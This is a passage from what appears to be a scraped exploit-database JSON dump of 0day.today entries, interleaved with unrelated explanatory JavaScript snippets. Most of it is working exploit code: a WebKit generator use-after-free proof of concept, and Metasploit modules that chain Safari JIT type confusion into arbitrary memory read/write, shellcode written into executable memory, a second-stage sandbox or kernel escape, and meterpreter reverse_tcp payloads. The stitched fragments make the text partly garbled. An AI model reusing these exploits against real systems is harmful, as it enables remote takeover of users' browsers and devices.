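console.log('fixed copy leaks', countLeaked(copyWasmSource(demoHeap, 700, 300, { fixed: true })), 'bytes');
console.log('first leaking offset for a 300-byte view:', minLeakingOffset(BUFFER_BYTES, 300));
```

With the page's own numbers the buggy copy starts at byte 1400, entirely outside the 1000-byte buffer, while any offset of 350 or less never leaves it; that is why a single hand-picked offset may not crash and the attached PoC tries many random (length, offset) pairs.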
"bulletinFamily": "exploit", "cvelist": ["CVE-2018-4218"], "modified": "2018-06-09T00:00:00", "id": "1337DAY-ID-30559", "href": "https://0day.today/exploit/description/30559", "sourceData": "<!--\r\nIn WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:\r\n \r\n var state = this.@generatorState;\r\n \r\nand set by calling:\r\n \r\n this.@generatorState = @GeneratorStateExecuting;\r\n \r\n \r\nChecking that the @generatorState property is set is also used in place of type checking the generator.\r\n \r\nTherefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState is set, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.\r\n \r\nIt is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.\r\n \r\nGenerators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after-free.\r\n \r\nA minimal sample of the script causing this problem is below, and a full PoC is attached.\r\n \r\nvar iterator;\r\n \r\nvar a = [];\r\n \r\nfunction* foo(index) {\r\n \r\n while (1) {\r\n var q = a.pop();\r\n if(q){\r\n q.__proto__ = iterator;\r\n q.next();\r\n }\r\n yield index++;\r\n }\r\n}\r\n \r\nfunction* foo2(){\r\n yield;\r\n}\r\n \r\nvar temp = foo2(0);\r\n \r\nfor(var i = 0; i < 10; i++){ // make a few objects with @generatorState set\r\n var q = {};\r\n q.__proto__ = temp;\r\n q.next();\r\n q.__proto__ = 
{};\r\n a.push(q);\r\n \r\n}\r\n \r\niterator = foo(0);\r\n \r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next().value);\r\n-->\r\n \r\n<html><body><script>\r\nprint = console.log;\r\nprint(\"top\");\r\nvar iterator;\r\nvar o = function(){print(\"hello\")};\r\nvar a = [];\r\nfunction* foo(index) {\r\n //print(\"start\");\r\n \r\n while (1) {\r\n //if(index == 77){\r\n // o = 0;\r\n // gc(); \r\n// index = 2;\r\n // var a = [1, 2, 3, 4];\r\n //yield 9;\r\n //print(\"a vale \" + a[0]);\r\n //}\r\n //if(index == 1){\r\n //index = 77;\r\n // print(\"INTERNAL CALL\")\r\n // iterator.next();\r\n //index++;\r\n \r\n //}\r\n //var b = [1, 2, 3, 4];\r\n var q = a.pop();\r\n if(q){\r\n print(\"here1\");\r\n q.__proto__ = iterator;\r\n q.next();\r\n }\r\n yield index++;\r\n //print(\"bval\" + b[0]);\r\n }\r\n}\r\n \r\nfunction* foo2(){\r\n \r\n yield;\r\n \r\n}\r\n \r\nvar temp = foo2(0);\r\n \r\nfor(var i = 0; i < 10; i++){\r\n \r\n var q = {};\r\n q.__proto__ = temp;\r\n q.next();\r\n q.__proto__ = {};\r\n a.push(q);\r\n \r\n}\r\n//print(a);\r\niterator = foo(0);\r\n \r\n \r\n// expected output: 0\r\n \r\n \r\n \r\n \r\no.__proto__ = iterator;\r\n//print(\"FIRST CALL\")\r\n//print(o.next().value);\r\n//print(\"SECOND CALL\")\r\n//print(o.next().value);\r\n//print(\"THIRD CALL\")\r\n \r\nfor(var i = 0; i < 10; i++){\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next(\"hello\").value);\r\n}\r\n \r\n//print(\"FOURTH CALL\")\r\n//print(iterator.next().value);\r\no();\r\n</script></body></html>\n\n# 0day.today [2018-06-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30559"}, {"lastseen": "2018-12-18T08:10:31", "description": "Exploit for macOS platform in category remote exploits", "edition": 1, "published": "2018-12-15T00:00:00", "title": "Safari - Proxy Object Type Confusion Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4404", "CVE-2018-4233"], "modified": "2018-12-15T00:00:00", "id": 
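Added example (mine, not WebKit's GeneratorPrototype.js and not part of the 0day.today CVE-2018-4218 entry): a JavaScript model of the check described above. WeakGen keeps the generator state as an ordinary, inheritable property, which is the flawed design; SafeGen keeps it in an identity-keyed slot. Both are driven by the same throwaway-generator, prototype-swap, re-entrant next() sequence as the PoC. The class names, the `frame` object and the `pc` counter are constructed stand-ins for the engine's saved generator frame, not WebKit identifiers.

```javascript
'use strict';

const SUSPENDED = 'suspended';
const EXECUTING = 'executing';
const COMPLETED = 'completed';

// Flawed design: state and frame are ordinary properties. The only "is this a generator"
// check is that a state value can be found, and a prototype-chain lookup satisfies it for
// any object that inherits from a real generator.
class WeakGen {
  constructor(steps) {
    this.state = SUSPENDED;
    this.frame = { steps, pc: 0 };   // stands in for the generator's saved frame
  }
  next() {
    const state = this.state;        // inherited lookup: an impostor passes
    if (state === undefined) throw new TypeError('|this| should be a generator');
    if (state === EXECUTING) throw new TypeError('Generator is executing');
    if (state === COMPLETED) return { value: undefined, done: true };
    this.state = EXECUTING;          // becomes an own property of the impostor, not of the real generator
    const frame = this.frame;        // still inherited: the real generator's frame
    const step = frame.steps[frame.pc++];
    const value = typeof step === 'function' ? step() : step;   // "runs" the generator body
    this.state = frame.pc >= frame.steps.length ? COMPLETED : SUSPENDED;
    return { value, done: false };
  }
}

// Hardened design: state and frame live in a slot keyed by object identity, so an object
// that merely inherits from a generator has no slot and is rejected before any resume.
const slots = new WeakMap();
class SafeGen {
  constructor(steps) {
    slots.set(this, { state: SUSPENDED, frame: { steps, pc: 0 } });
  }
  next() {
    const slot = slots.get(this);
    if (slot === undefined) throw new TypeError('|this| should be a generator');
    if (slot.state === EXECUTING) throw new TypeError('Generator is executing');
    if (slot.state === COMPLETED) return { value: undefined, done: true };
    slot.state = EXECUTING;
    const step = slot.frame.steps[slot.frame.pc++];
    const value = typeof step === 'function' ? step() : step;
    slot.state = slot.frame.pc >= slot.frame.steps.length ? COMPLETED : SUSPENDED;
    return { value, done: false };
  }
}

// The PoC's sequence against either model: give a plain object its own state through a
// throwaway generator, re-point its prototype at the target, then call next() on it from
// inside the target's own body while the target is executing.
function reenter(Gen) {
  let impostor;
  const target = new Gen([
    () => { try { return 'inner:' + impostor.next().value; } catch (e) { return e.constructor.name; } },
    'second',
    'third',
  ]);
  const throwaway = new Gen(['a', 'b']);
  impostor = Object.create(throwaway);
  let setupRejected = null;
  try { impostor.next(); } catch (e) { setupRejected = e.constructor.name; }
  Object.setPrototypeOf(impostor, target);
  const first = target.next().value;
  const frame = Gen === WeakGen ? target.frame : slots.get(target).frame;
  return { setupRejected, first, pcAfter: frame.pc };
}

console.log('flawed:', reenter(WeakGen));
console.log('hardened:', reenter(SafeGen));
```

With WeakGen the impostor's own state satisfies the recursion check and the inherited frame is advanced a second time while the real generator is still executing (pc ends at 2 after a single outer next()), which is the re-entry that becomes a use-after-free in the real engine. With SafeGen both the setup call and the re-entrant call fail the slot check with a TypeError; that is also what ECMAScript's GeneratorValidate specifies, since it requires the [[GeneratorState]] internal slot, so Object.create(realGenerator).next() throws in a conforming engine.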
"1337DAY-ID-31793", "href": "https://0day.today/exploit/description/31793", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari Proxy Object Type Confusion',\r\n 'Description' => %q{\r\n This module exploits a type confusion bug in the Javascript Proxy object in\r\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\r\n it is possible to run arbitrary JS code during the execution of a CreateThis\r\n operation. This makes it possible to change the structure of e.g. an argument\r\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\r\n\r\n The JIT region is then replaced with shellcode which loads the second stage.\r\n The second stage exploits a logic error in libxpc, which uses command execution\r\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'saelo' ],\r\n 'References' => [\r\n ['CVE', '2018-4233'],\r\n ['CVE', '2018-4404'],\r\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\r\n ['URL', 'https://github.com/saelo/pwn2own2018'],\r\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\r\n ],\r\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\r\n 'Platform' => 'osx',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\r\n 'Targets' => [\r\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\r\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\r\n ],\r\n 'DisclosureDate' => 'Mar 15 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, 
\"Show debug information in the exploit javascript\", false]),\r\n ])\r\n end\r\n\r\n def offset_table\r\n {\r\n '10.12.6' => {\r\n :jsc_vtab => '0x0000d8d8',\r\n :dyld_stub_loader => '0x00001168',\r\n :dlopen => '0x000027f7',\r\n :confstr => '0x00002c84',\r\n :strlen => '0x00001b40',\r\n :strlen_got => '0xdc0',\r\n },\r\n '10.13' => {\r\n :jsc_vtab => '0x0000e5f8',\r\n :dyld_stub_loader => '0x000012a8',\r\n :dlopen => '0x00002e60',\r\n :confstr => '0x000024fc',\r\n :strlen => '0x00001440',\r\n :strlen_got => '0xee8',\r\n },\r\n '10.13.3' => {\r\n :jsc_vtab => '0xe5e8',\r\n :dyld_stub_loader => '0x1278',\r\n :dlopen => '0x2e30',\r\n :confstr => '0x24dc',\r\n :strlen => '0x1420',\r\n :strlen_got => '0xee0',\r\n },\r\n }\r\n end\r\n\r\n def exploit_data(directory, file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\r\n ::File.binread path\r\n end\r\n\r\n def stage1_js\r\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\r\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\r\n end\r\n\r\n def stage2_js\r\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\r\n payload_cmd = payload.raw\r\n if target['Arch'] == ARCH_PYTHON\r\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\r\n end\r\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\r\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\r\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\r\n end\r\n\r\n def get_offsets(user_agent)\r\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\r\n version = $1.gsub(\"_\", \".\")\r\n mac_osx_version = Gem::Version.new(version)\r\n if mac_osx_version >= Gem::Version.new('10.13.4')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif mac_osx_version < Gem::Version.new('10.12')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif offset_table.key?(version)\r\n offset = offset_table[version]\r\n return <<-EOF\r\nconst 
JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\r\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\r\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\r\nconst CONFSTR_OFFSET = #{offset[:confstr]};\r\nconst STRLEN_OFFSET = #{offset[:strlen]};\r\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\r\nEOF\r\n else\r\n print_warning \"No offsets for version #{mac_osx_version}\"\r\n end\r\n else\r\n print_warning \"Unexpected User-Agent\"\r\n end\r\n return false\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n user_agent = request['User-Agent']\r\n print_status(\"Request from #{user_agent}\")\r\n offsets = get_offsets(user_agent)\r\n unless offsets\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\r\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\r\n html = %Q^\r\n<html>\r\n<body>\r\n<script>\r\n#{stage1_js}\r\nstage1.replace = function(oldVal, newVal) {\r\n for (var idx = 0; idx < this.length; idx++) {\r\n var found = true;\r\n for (var j = idx; j < idx + 8; j++) {\r\n if (this[j] != oldVal.byteAt(j - idx)) {\r\n found = false;\r\n break;\r\n }\r\n }\r\n if (found)\r\n break;\r\n }\r\n this.set(newVal.bytes(), idx);\r\n};\r\n#{stage2_js}\r\n#{utils}\r\n#{int64}\r\n#{offsets}\r\n\r\nvar ready = new Promise(function(resolve) {\r\n if (typeof(window) === 'undefined')\r\n resolve();\r\n else\r\n window.onload = function() {\r\n resolve();\r\n }\r\n});\r\n\r\nready = Promise.all([ready]);\r\n\r\nprint = function(msg) {\r\n //console.log(msg);\r\n //document.body.innerText += msg + '\\\\n';\r\n}\r\n\r\n// Must create this indexing type transition first,\r\n// otherwise the JIT will deoptimize later.\r\nvar a = [13.37, 13.37];\r\na[0] = {};\r\n\r\nvar referenceFloat64Array = new Float64Array(0x1000);\r\n\r\n//\r\n// Bug: the DFG JIT does not take into account that, through the use of a\r\n// Proxy, it is possible to run arbitrary JS code during the execution of a\r\n// CreateThis operation. 
This makes it possible to change the structure of e.g.\r\n// an argument without causing a bailout, leading to a type confusion.\r\n//\r\n\r\n//\r\n// addrof primitive\r\n//\r\nfunction setupAddrof() {\r\n function InfoLeaker(a) {\r\n this.address = a[0];\r\n }\r\n\r\n var trigger = false;\r\n var leakme = null;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = leakme;\r\n return target[propname];\r\n },\r\n };\r\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(obj) {\r\n leakme = obj;\r\n arg = [1.1, 1.1];\r\n var o = new InfoLeakerProxy(arg);\r\n return o.address;\r\n };\r\n}\r\n\r\n//\r\n// fakeobj primitive\r\n//\r\nfunction setupFakeobj() {\r\n function ObjFaker(a, address) {\r\n a[0] = address;\r\n }\r\n\r\n var trigger = false;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = {};\r\n return target[propname];\r\n },\r\n };\r\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(address) {\r\n arg = [1.1, 1.1];\r\n var o = new ObjFakerProxy(arg, address);\r\n return arg[0];\r\n };\r\n}\r\n\r\nfunction makeJITCompiledFunction() {\r\n // Some code to avoid inlining...\r\n function target(num) {\r\n for (var i = 2; i < num; i++) {\r\n if (num % i === 0) {\r\n return false;\r\n }\r\n }\r\n return true;\r\n }\r\n\r\n // Force JIT compilation.\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n return target;\r\n}\r\n\r\nfunction pwn() {\r\n // Spray Float64Array structures so that structure ID 0x1000 will\r\n // be a Float64Array with very high 
probability\r\n var structs = [];\r\n for (var i = 0; i < 0x1000; i++) {\r\n var a = new Float64Array(1);\r\n a['prop' + i] = 1337;\r\n structs.push(a);\r\n }\r\n\r\n // Setup exploit primitives\r\n var addrofOnce = setupAddrof();\r\n var fakeobjOnce = setupFakeobj();\r\n\r\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\r\n /*\r\n var stuff = [];\r\n for (var i = 0; i < 0x100000; i++) {\r\n stuff.push({foo: i});\r\n }\r\n */\r\n\r\n var float64MemView = new Float64Array(0x200);\r\n var uint8MemView = new Uint8Array(0x1000);\r\n\r\n // Setup container to host the fake Float64Array\r\n var jsCellHeader = new Int64([\r\n 00, 0x10, 00, 00, // m_structureID\r\n 0x0, // m_indexingType\r\n 0x2b, // m_type\r\n 0x08, // m_flags\r\n 0x1 // m_cellState\r\n ]);\r\n\r\n var container = {\r\n jsCellHeader: jsCellHeader.asJSValue(),\r\n butterfly: null,\r\n vector: float64MemView,\r\n length: (new Int64('0x0001000000001337')).asJSValue(),\r\n mode: {}, // an empty object, we'll need that later\r\n };\r\n\r\n // Leak address and inject fake object\r\n // RawAddr == address in float64 form\r\n var containerRawAddr = addrofOnce(container);\r\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\r\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\r\n\r\n ///\r\n /// BEGIN CRITICAL SECTION\r\n ///\r\n /// Objects are corrupted, a GC would now crash the process.\r\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\r\n ///\r\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\r\n while (!(driver instanceof Float64Array)) {\r\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\r\n container.jsCellHeader = jsCellHeader.asJSValue();\r\n }\r\n\r\n // Get some addresses that we'll need to repair our objects. 
We'll abuse the .mode\r\n // property of the container to leak addresses.\r\n driver[2] = containerRawAddr;\r\n var emptyObjectRawAddr = float64MemView[6];\r\n container.mode = referenceFloat64Array;\r\n var referenceFloat64ArrayRawAddr = float64MemView[6];\r\n\r\n // Fixup the JSCell header of the container to make it look like an empty object.\r\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\r\n driver[2] = emptyObjectRawAddr;\r\n var header = float64MemView[0];\r\n driver[2] = containerRawAddr;\r\n float64MemView[0] = header;\r\n\r\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\r\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\r\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\r\n driver[2] = referenceFloat64ArrayRawAddr;\r\n var header = float64MemView[0];\r\n var length = float64MemView[3];\r\n var mode = float64MemView[4];\r\n driver[2] = containerRawAddr;\r\n float64MemView[2] = header;\r\n float64MemView[3] = 0;\r\n float64MemView[5] = length;\r\n float64MemView[6] = mode;\r\n\r\n // Root the container object so it isn't garbage collected.\r\n // This will allocate a butterfly for the fake object and store a reference to the container there.\r\n // The fake array itself is rooted by the memory object (closures).\r\n driver.container = container;\r\n\r\n ///\r\n /// END CRITICAL SECTION\r\n ///\r\n /// Objects are repaired, we will now survive a GC\r\n ///\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n\r\n memory = {\r\n read: function(addr, length) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n var a = new Array(length);\r\n for (var i = 0; i < length; i++)\r\n a[i] = uint8MemView[i];\r\n return a;\r\n },\r\n\r\n write: function(addr, data) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n for (var i = 0; i < 
data.length; i++)\r\n uint8MemView[i] = data[i];\r\n },\r\n\r\n read8: function(addr) {\r\n driver[2] = addr.asDouble();\r\n return Int64.fromDouble(float64MemView[0]);\r\n },\r\n\r\n write8: function(addr, value) {\r\n driver[2] = addr.asDouble();\r\n float64MemView[0] = value.asDouble();\r\n },\r\n\r\n addrof: function(obj) {\r\n float64MemView.leakme = obj;\r\n var butterfly = Int64.fromDouble(driver[1]);\r\n return memory.read8(Sub(butterfly, 0x10));\r\n },\r\n };\r\n\r\n print(\"[+] Got stable memory read/write!\");\r\n\r\n // Find binary base\r\n var funcAddr = memory.addrof(Math.sin);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n var codeAddr = memory.read8(Add(executableAddr, 24));\r\n var vtabAddr = memory.read8(codeAddr);\r\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\r\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\r\n\r\n var dyldStubLoaderAddr = memory.read8(jscBase);\r\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\r\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\r\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\r\n print(\"[*] dyld.dylib @ \" + dyldBase);\r\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\r\n\r\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\r\n print(\"[*] confstr @ \" + confstrAddr);\r\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\r\n print(\"[*] dlopen @ \" + dlopenAddr);\r\n\r\n // Patching shellcode\r\n var stage2Addr = memory.addrof(stage2);\r\n stage2Addr = memory.read8(Add(stage2Addr, 16));\r\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\r\n\r\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\r\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\r\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\r\n stage1.replace(new Int64(\"0x4444444444444444\"), 
dlopenAddr);\r\n print(\"[+] Shellcode patched\");\r\n\r\n // Leak JITCode pointer poison value\r\n var poison_addr = Add(jscBase, 305152);\r\n print(\"[*] Poison value @ \" + poison_addr);\r\n var poison = memory.read8(poison_addr);\r\n print(\"[*] Poison value: \" + poison);\r\n\r\n // Shellcode\r\n var func = makeJITCompiledFunction();\r\n var funcAddr = memory.addrof(func);\r\n print(\"[+] Shellcode function object @ \" + funcAddr);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n print(\"[+] Executable instance @ \" + executableAddr);\r\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\r\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\r\n\r\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\r\n var codeAddr = Xor(codeAddrPoisoned, poison);\r\n print(\"[+] RWX memory @ \" + codeAddr.toString());\r\n print(\"[+] Writing shellcode...\");\r\n var origCode = memory.read(codeAddr, stage1.length);\r\n memory.write(codeAddr, stage1);\r\n\r\n print(\"[!] Jumping into shellcode...\");\r\n var res = func();\r\n if (res === 0) {\r\n print(\"[+] Shellcode executed successfully!\");\r\n } else {\r\n print(\"[-] Shellcode failed to execute: error \" + res);\r\n }\r\n\r\n memory.write(codeAddr, origCode);\r\n print(\"[*] Restored previous JIT code\");\r\n\r\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n}\r\n\r\nready.then(function() {\r\n try {\r\n pwn();\r\n } catch (e) {\r\n print(\"[-] Exception caught: \" + e);\r\n }\r\n}).catch(function(err) {\r\n print(\"[-] Initialization failed\");\r\n});\r\n\r\n</script>\r\n</body>\r\n</html>\r\n ^\r\n unless datastore['DEBUG_EXPLOIT']\r\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend\n\n# 0day.today [2018-12-18] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, 
"sourceHref": "https://0day.today/exploit/31793"}, {"lastseen": "2019-06-03T13:53:45", "description": "This Metasploit module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. 
The process's credential and sandbox structure in the kernel is overwritten and the meterpreter payload's code signature hash is added to the kernel's trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.", "edition": 1, "published": "2019-06-03T00:00:00", "title": "Safari #Webkit Proxy Object Type Confusion Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4233", "CVE-2017-13861"], "modified": "2019-06-03T00:00:00", "id": "1337DAY-ID-32828", "href": "https://0day.today/exploit/description/32828", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\r\n 'Description' => %q{\r\n This module exploits a type confusion bug in the Javascript Proxy object in\r\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\r\n it is possible to run arbitrary JS code during the execution of a CreateThis\r\n operation. This makes it possible to change the structure of e.g. an argument\r\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\r\n\r\n The type confusion leads to the ability to allocate fake Javascript objects,\r\n as well as the ability to find the address in memory of a Javascript object.\r\n This allows us to construct a fake JSCell object that can be used to read\r\n and write arbitrary memory from Javascript. 
The module then uses a ROP chain\r\n to write the first stage shellcode into executable memory within the Safari\r\n process and kick off its execution.\r\n\r\n The first stage maps the second stage macho (containing CVE-2017-13861) into\r\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\r\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\r\n kernel memory. The process's credential and sandbox structure in the kernel\r\n is overwritten and the meterpreter payload's code signature hash is added to\r\n the kernel's trust cache, allowing Safari to load and execute the (self-signed)\r\n meterpreter payload.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'saelo',\r\n 'niklasb',\r\n 'Ian Beer',\r\n 'siguza',\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-4233'],\r\n ['CVE', '2017-13861'],\r\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\r\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\r\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\r\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\r\n ],\r\n 'Arch' => ARCH_AARCH64,\r\n 'Platform' => 'apple_ios',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\r\n 'Targets' => [[ 'Automatic', {} ]],\r\n 'DisclosureDate' => 'Mar 15 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\r\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\r\n ])\r\n end\r\n\r\n def exploit_data(directory, file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\r\n ::File.binread path\r\n end\r\n\r\n def payload_url\r\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\r\n end\r\n\r\n def get_version(user_agent)\r\n if user_agent =~ /OS 
(.*?) like Mac OS X\\)/\r\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\r\n return ios_version\r\n end\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if request.uri =~ %r{/apple-touch-icon*}\r\n return\r\n elsif request.uri =~ %r{/favicon*}\r\n return\r\n elsif request.uri =~ %r{/payload10$*}\r\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\r\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\r\n print_good(\"Sent sha1 iOS 10 payload\")\r\n return\r\n elsif request.uri =~ %r{/payload11$*}\r\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\r\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\r\n print_good(\"Sent sha256 iOS 11 payload\")\r\n return\r\n end\r\n\r\n user_agent = request['User-Agent']\r\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\r\n version = get_version(user_agent)\r\n ios_11 = (version >= Gem::Version.new('11.0.0'))\r\n if request.uri =~ %r{/exploit$}\r\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\r\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\r\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\r\n payload_url_index = loader_data.index('PAYLOAD_URL')\r\n loader_data[payload_url_index, config.length] = config\r\n print_good(\"Sent async_wake exploit\")\r\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\r\n 